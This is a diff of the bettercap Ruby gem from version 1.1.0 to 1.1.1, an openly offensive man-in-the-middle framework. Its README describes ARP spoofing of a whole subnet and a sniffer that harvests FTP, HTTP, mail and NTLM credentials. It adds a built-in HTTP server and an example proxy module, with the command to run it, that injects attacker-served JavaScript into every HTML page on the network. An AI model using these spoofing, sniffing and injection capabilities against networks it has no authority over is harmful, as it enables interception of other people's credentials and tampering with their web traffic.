bettercap 1.1.0 → 1.1.1

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: d7598d4cba920529ad57692a3f1428fac16ae485
-  data.tar.gz: 1cc7412e83d89935bbce39bf668d37a75f75f5ae
+  metadata.gz: 2f2679288f69bf8a4ffddf816e7ea6f38aa9d9f3
+  data.tar.gz: 87d882d14a178868c080c687e1adf4986b654155
 SHA512:
-  metadata.gz: e5be756ac580c37b6402e96f97eca361ccc5c9be50f81dd80339820d349057027a2abd7dabc28dbd1d688d18a71df9ad8370b3567691c379d524cd72ea1e7317
-  data.tar.gz: f54e597cc91f1ba8923e242f8b5653a92bbdbf06e010ab6be02662a299117639a21fcbbf65fe863b7f81f7c7fc7e0447219b9a8c48a3521b88f71e890de2b872
+  metadata.gz: 595325163b629bf5a2c5e7601850db166ed3a85d6536ffe57f2988d8126898bcbe39ec5ac49b86915132434386ab7993d061887b1385ebb77de392a3707a8b4a
+  data.tar.gz: d954e56b18fd9e73f80f58919887f3589b1749eccc9f4a131f6e677f636ba5cbabd14823383ea350cbe7229a4d27e7f2ffd9c4f0e18d0f3751f25924b6088596

data/README.md

@@ -4,10 +4,41 @@ BETTERCAP
 Copyleft of **Simone 'evilsocket' Margaritelli**.  
 http://www.evilsocket.net/
 
+http://www.bettercap.org/
 ---
 
-BetterCap is a complete, modular, portable and easily extensible **MITM** framework with every kind of features could
-be needed while performing a man in the middle attack.
+**bettercap** is a complete, modular, portable and easily extensible **MITM** tool and framework with every kind of diagnostic
+and offensive feature you could need in order to perform a man in the middle attack.
+
+MOTIVATIONS
+===
+
+> Yet another MITM tool? C'mon, really?!!?
+
+This is exactly what you are thinking right now, isn't it? :D
+But allow yourself to think about it for 5 more minutes ... what you should be really asking is:
+
+> Does a complete, modular, portable and easy to extend MITM tool actually exist?
+
+If your answer is "ettercap", let me tell you something:
+
+* ettercap **was** a great tool, but it made its time.
+* ettercap filters **do not** work most of the times, are outdated and hard to implement due to the specific language they're implemented in.
+* ettercap is freaking **unstable** on big networks ... try to launch the host discovery on a bigger network rather than the usual /24 ;)
+* yeah you can see connections and raw pcap stuff, **nice toy**, but **as a professional researcher I want to see only relevant stuff**.
+* unless you're a C/C++ developer, you can't easily extend ettercap or make your own module.
+
+Indeed you could use more than just one tool ... maybe [arpspoof](http://linux.die.net/man/8/arpspoof) to perform the actual poisoning, [mitmproxy](http://mitmproxy.org) to intercept HTTP stuff and inject your payloads and so forth ... I don't know about you, but I **hate** when I need to use a dozen of tools just to perform one single attack, especially when I need to do some black magic in order to make all of them work on my distro or on OSX ... what about the [KISS](https://en.wikipedia.org/wiki/KISS_principle) principle?
+
+So **bettercap** was born ( isn't the name pure genius? XD ) ...
+
+HOST DISCOVERY + ARP MAN IN THE MIDDLE
+=== 
+
+You can target the whole network or a single known address, it doesn't really matter, bettercap arp spoofing capabilities and its multiple hosts discovery agents will do the dirty work for you.  
+Just launch the tool and wait for it to do its job ... again, [KISS!](https://en.wikipedia.org/wiki/KISS_principle)
+
+![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/discovery.png)
 
 CREDENTIALS SNIFFER
 ===
@@ -23,44 +54,48 @@ The built in sniffer is currently able to dissect and print from the network the
 - POP, IMAP and SMTP credentials.
 - NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
 
+![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/credentials.png)
+
 **Examples**
 
 Default sniffer mode, all parsers enabled:
     
-    sudo ruby bettercap.rb -X
+    sudo bettercap -X
     
 Enable sniffer and load only specified parsers:
     
-    sudo ruby bettercap.rb -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"
+    sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"
 
 Enable sniffer + all parsers and parse local traffic as well:
     
-    sudo ruby bettercap.rb -X -L
+    sudo bettercap -X -L
     
-TRANSPARENT PROXY
+MODULAR TRANSPARENT PROXY
 ===
 
 A modular transparent proxy can be started with the --proxy argument, by default it won't do anything 
 but logging HTTP requests, but if you specify a **--proxy-module** argument you will be able to load
 your own modules and manipulate HTTP traffic as you like.  
 
+![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/proxy.png)
+
 **Examples**
 
 Enable proxy on default ( 8080 ) port with no modules ( quite useless ): 
     
-    sudo ruby bettercap.rb --proxy
+    sudo bettercap --proxy
 
 Enable proxy and use a custom port:
     
-    sudo ruby bettercap.rb --proxy --proxy-port=8081
+    sudo bettercap --proxy --proxy-port=8081
     
 Enable proxy and load the module **example_proxy_module.rb**:
     
-    sudo ruby bettercap.rb --proxy --proxy-module=example_proxy_module.rb
+    sudo bettercap --proxy --proxy-module=example_proxy_module.rb
 
 Disable spoofer and enable proxy ( stand alone proxy mode ):
 
-    sudo ruby bettercap.rb -S NONE --proxy
+    sudo bettercap -S NONE --proxy
 
 **Modules**
 
@@ -81,16 +116,57 @@ class HackTitle < Proxy::Module
 end
 ```
 
+BUILTIN HTTP SERVER
+===
+
+You want to serve your custom javascript files on the network? Maybe you wanna inject some custom
+script or image into HTTP responses using a transparent proxy module but you got no public server
+to use? **no worries dude** :D  
+A builtin HTTP server comes with bettercap, allowing you to serve custom contents from your own
+machine without installing and configuring other softwares such as Apache, nginx or lighttpd. 
+
+You could use a **proxy module** like the following:
+
+```ruby
+class InjectJS < Proxy::Module
+  def on_request( request, response )
+    # is it a html page?
+    if response.content_type == 'text/html'
+      Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
+      # get the local interface address and HTTPD port
+      localaddr = Context.get.iface[:ip_saddr]
+      localport = Context.get.options[:httpd_port]
+      # inject the js
+      response.body.sub!( '</title>', "<script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script></title>" )
+    end
+  end
+end
+```
+
+And then use it to inject the js file in every HTTP response of the network, using bettercap itself
+to serve the file:
+
+    sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb 
+
 HOW TO INSTALL
 ===
 
+**Stable Release ( GEM )**
+    
+    gem install bettercap
+    
+**From Source**
+    
+    git clone https://github.com/evilsocket/bettercap
+    cd bettercap
     gem build bettercap.gemspec
     sudo gem install bettercap*.gem
 
 DEPENDS
 ===
 
+All dependencies will be automatically installed through the GEM system.
+
 - colorize (**gem install colorize**)
 - packetfu (**gem install packetfu**)
-- pcaprub  (**gem install pcaprub**) [sudo apt-get install ruby-dev libpcap-dev]
-
+- pcaprub  (**gem install pcaprub**) [sudo apt-get install ruby-dev libpcap-dev]

data/bin/bettercap

@@ -17,7 +17,7 @@ require 'colorize'
 require 'packetfu'
 require 'ipaddr'
 
-Object.send :remove_const, :Config
+Object.send :remove_const, :Config rescue nil
 Config = RbConfig
 
 require 'bettercap/error'
@@ -36,16 +36,12 @@ require 'bettercap/proxy/request'
 require 'bettercap/proxy/response'
 require 'bettercap/proxy/proxy'
 require 'bettercap/proxy/module'
+require 'bettercap/httpd/server'
 
 begin
 
-  raise BetterCap::Error, 'This software must run as root.' unless Process.uid == 0
-
-  puts '---------------------------------------------------------'.yellow
-  puts "                   BETTERCAP v#{BetterCap::VERSION}\n\n".green
-  puts '          by Simone "evilsocket" Margaritelli'.green
-  puts '                  evilsocket@gmail.com    '.green
-  puts "---------------------------------------------------------\n\n".yellow
+  puts BetterCap::BANNER.green.bold
+  puts "\n\n\n"
 
   ctx = Context.get
 
@@ -60,11 +56,11 @@ begin
       ctx.options[:spoofer] = v
     end
 
-    opts.on( '-T', '--target ADDRESS', 'Target ip address, if not specified the whole subnet will be targeted.' ) do |v|
+    opts.on( '-T', '--target ADDRESS', 'Target IP address, if not specified the whole subnet will be targeted.' ) do |v|
       ctx.options[:target] = v
     end
 
-    opts.on( '-O', '--log LOG_FILE', 'Log all messagges into a file, if not specified the log messages will be only print into the shell.' ) do |v|
+    opts.on( '-O', '--log LOG_FILE', 'Log all messages into a file, if not specified the log messages will be only print into the shell.' ) do |v|
       ctx.options[:logfile] = v
     end
 
@@ -101,8 +97,46 @@ begin
     opts.on( '--proxy-module MODULE', 'Ruby proxy module to load.' ) do |v|
       ctx.options[:proxy_module] = File.expand_path v
     end
+
+    opts.on( '--httpd', 'Enable HTTP server, default to false.' ) do
+      ctx.options[:httpd] = true
+    end
+
+    opts.on( '--httpd-port PORT', 'Set HTTP server port, default to ' + ctx.options[:httpd_port].to_s +  '.' ) do |v|
+      ctx.options[:httpd] = true
+      ctx.options[:httpd_port] = v.to_i
+    end
+
+    opts.on( '--httpd-path PATH', 'Set HTTP server path, default to ' + ctx.options[:httpd_path] +  '.' ) do |v|
+      ctx.options[:httpd] = true
+      ctx.options[:httpd_path] = v
+    end
+
+    opts.on('-h', '--help', 'Display the available options.') do
+      puts opts
+      puts "\nExamples:\n".bold
+      puts " - Sniffer / Credentials Harvester\n".bold
+      puts "  Default sniffer mode, all parsers enabled:\n\n"
+      puts "    sudo bettercap -X\n".bold
+      puts "  Enable sniffer and load only specified parsers:\n\n"
+      puts "    sudo bettercap -X -P \"FTP,HTTPAUTH,MAIL,NTLMSS\"\n".bold
+      puts "  Enable sniffer + all parsers and parse local traffic as well:\n\n"
+      puts "    sudo bettercap -X -L\n".bold
+      puts " - Transparent Proxy\n".bold
+      puts "  Enable proxy on default ( 8080 ) port with no modules ( quite useless ):\n\n"
+      puts "    sudo bettercap --proxy\n".bold
+      puts "  Enable proxy and use a custom port:\n\n"
+      puts "    sudo bettercap --proxy --proxy-port=8081\n".bold
+      puts "  Enable proxy and load the module example_proxy_module.rb:\n\n"
+      puts "    sudo bettercap --proxy --proxy-module=example_proxy_module.rb\n".bold
+      puts "  Disable spoofer and enable proxy ( stand alone proxy mode ):\n\n"
+      puts "    sudo bettercap -S NONE --proxy".bold
+      exit
+    end
   end.parse!
 
+  raise BetterCap::Error, 'This software must run as root.' unless Process.uid == 0
+
   Logger.debug_enabled = true unless !ctx.options[:debug]
 
   Logger.logfile = ctx.options[:logfile]
@@ -122,15 +156,17 @@ begin
 
   ctx.spoofer = SpooferFactory.get_by_name( ctx.options[:spoofer] )
 
-  Logger.info "  Local Address : #{ctx.iface[:ip_saddr]}"
-  Logger.info "  Local MAC     : #{ctx.iface[:eth_saddr]}"
-  Logger.info "  Gateway       : #{ctx.gateway}"
+  Logger.info "  Local : #{ctx.iface[:ip_saddr]} ( #{ctx.iface[:eth_saddr]} )"
 
   Logger.debug "Module: #{ctx.options[:spoofer]}"
 
   ctx.spoofer.start
 
   if ctx.options[:proxy]
+    if ctx.options[:sniffer] and ( ctx.options[:parsers].include?'*' or ctx.options[:parsers].include?'URL' )
+      Logger.warn "WARNING: Both HTTP transparent proxy and URL parser are enabled, you're gonna see duplicated logs."
+    end
+
     ctx.firewall.add_port_redirection( ctx.options[:iface], 'TCP', 80, ctx.iface[:ip_saddr], ctx.options[:proxy_port] )
 
     if not ctx.options[:proxy_module].nil?
@@ -157,6 +193,11 @@ begin
     ctx.proxy.start
   end
 
+  if ctx.options[:httpd]
+    ctx.httpd = HTTPD::Server.new( ctx.options[:httpd_port], ctx.options[:httpd_path] )
+    ctx.httpd.start
+  end
+
   if ctx.options[:sniffer]
       Sniffer.start ctx
   else

data/lib/bettercap/banner

@@ -0,0 +1,6 @@
+ _          _   _
+| |__   ___| |_| |_ ___ _ __ ___ __ _ _ __
+| '_ \ / _ \ __| __/ _ \ '__/ __/ _` | '_ \
+| |_) |  __/ |_| ||  __/ | | (_| (_| | |_) |
+|_.__/ \___|\__|\__\___|_|  \___\__,_| .__/
+                                     |_| #VERSION#

data/lib/bettercap/context.rb

@@ -15,7 +15,7 @@ require 'bettercap/error'
 
 class Context
   attr_accessor :options, :iface, :ifconfig, :network, :firewall, :gateway,
-                :targets, :spoofer, :proxy
+                :targets, :spoofer, :proxy, :httpd
 
   @@instance = nil
 
@@ -37,25 +37,32 @@ class Context
         :local => false,
         :debug => false,
         :arpcache => false,
+
         :proxy => false,
         :proxy_port => 8080,
-        :proxy_module => nil
+        :proxy_module => nil,
+
+        :httpd => false,
+        :httpd_port => 8081,
+        :httpd_path => './'
     }
 
     @iface = nil
     @ifconfig = nil
     @network = nil
-    @firewall = FirewallFactory.get_firewall
+    @firewall = nil
     @gateway = nil
     @targets = []
     @proxy = nil
     @spoofer = nil
+    @httpd = nil
 
     @discovery_running = false
     @discovery_thread = nil
   end
 
   def update_network
+    @firewall = FirewallFactory.get_firewall
     @iface    = PacketFu::Utils.whoami? :iface => @options[:iface]
     @ifconfig = PacketFu::Utils.ifconfig @options[:iface]
     @network  = @ifconfig[:ip4_obj]
@@ -120,5 +127,9 @@ class Context
     if !@firewall.nil?
       @firewall.enable_forwarding(false)
     end
+
+    if !@httpd.nil?
+      @httpd.stop
+    end
   end
 end

data/lib/bettercap/httpd/server.rb

@@ -0,0 +1,46 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+require 'webrick'
+
+require 'bettercap/logger'
+
+module HTTPD
+
+class Server
+  def initialize( port = 8081, path = './' )
+    @port = port
+    @path = path
+    @server = WEBrick::HTTPServer.new(
+        :Port => @port,
+        :DocumentRoot => @path,
+        :Logger => WEBrick::Log.new("/dev/null"),
+        :AccessLog => []
+    )
+  end
+
+  def start
+    Logger.info "Starting HTTPD on port #{@port} and path #{@path} ..."
+    @thread = Thread.new {
+      @server.start
+    }
+  end
+
+  def stop
+    Logger.info 'Stopping HTTPD ...'
+
+    @server.stop
+    @thread.join
+  end
+end
+
+end
+

data/lib/bettercap/sniffer/parsers/mail.rb

@@ -13,7 +13,7 @@ require 'bettercap/sniffer/parsers/base'
 
 class MailParser < BaseParser
     def initialize
-        @filters = [ /(\d+ )?(auth|authenticate) (login|plain)/i, /(\d+ )?login/i ]
+        @filters = [ /(\d+ )?(auth|authenticate) ([a-z\-_0-9]+)/i ]
         @name = 'MAIL'
     end
 end

data/lib/bettercap/sniffer/sniffer.rb

@@ -31,7 +31,11 @@ class Sniffer
         next if ( pkt.ip_saddr == ctx.iface[:ip_saddr] or pkt.ip_daddr == ctx.iface[:ip_saddr] ) and !ctx.options[:local]
 
         @@parsers.each do |parser|
-          parser.on_packet pkt
+          begin
+            parser.on_packet pkt
+          rescue Exception => e
+            Logger.warn e.message
+          end
         end
       end
     end

data/lib/bettercap/spoofers/arp.rb

@@ -32,7 +32,7 @@ class ArpSpoofer < ISpoofer
       raise BetterCap::Error, "Couldn't determine router MAC"
     end
 
-    Logger.info "  Gateway MAC   : #{@gw_hw}"
+    Logger.info "  Gateway : #{@ctx.gateway} ( #{@gw_hw} )"
   end
 
   def send_spoofed_packed( saddr, smac, daddr, dmac )

data/lib/bettercap/version.rb

@@ -10,5 +10,6 @@ This project is released under the GPL 3 license.
 
 =end
 module BetterCap
-  VERSION = '1.1.0'
+  VERSION = '1.1.1'
+  BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.1.0
+  version: 1.1.1
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2015-07-22 00:00:00.000000000 Z
+date: 2015-07-25 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -59,6 +59,7 @@ executables:
 extensions: []
 extra_rdoc_files: []
 files:
+- lib/bettercap/banner
 - lib/bettercap/base/ifirewall.rb
 - lib/bettercap/base/ispoofer.rb
 - lib/bettercap/context.rb
@@ -72,6 +73,7 @@ files:
 - lib/bettercap/factories/spoofer_factory.rb
 - lib/bettercap/firewalls/linux.rb
 - lib/bettercap/firewalls/osx.rb
+- lib/bettercap/httpd/server.rb
 - lib/bettercap/hw-prefixes
 - lib/bettercap/logger.rb
 - lib/bettercap/monkey/packetfu/utils.rb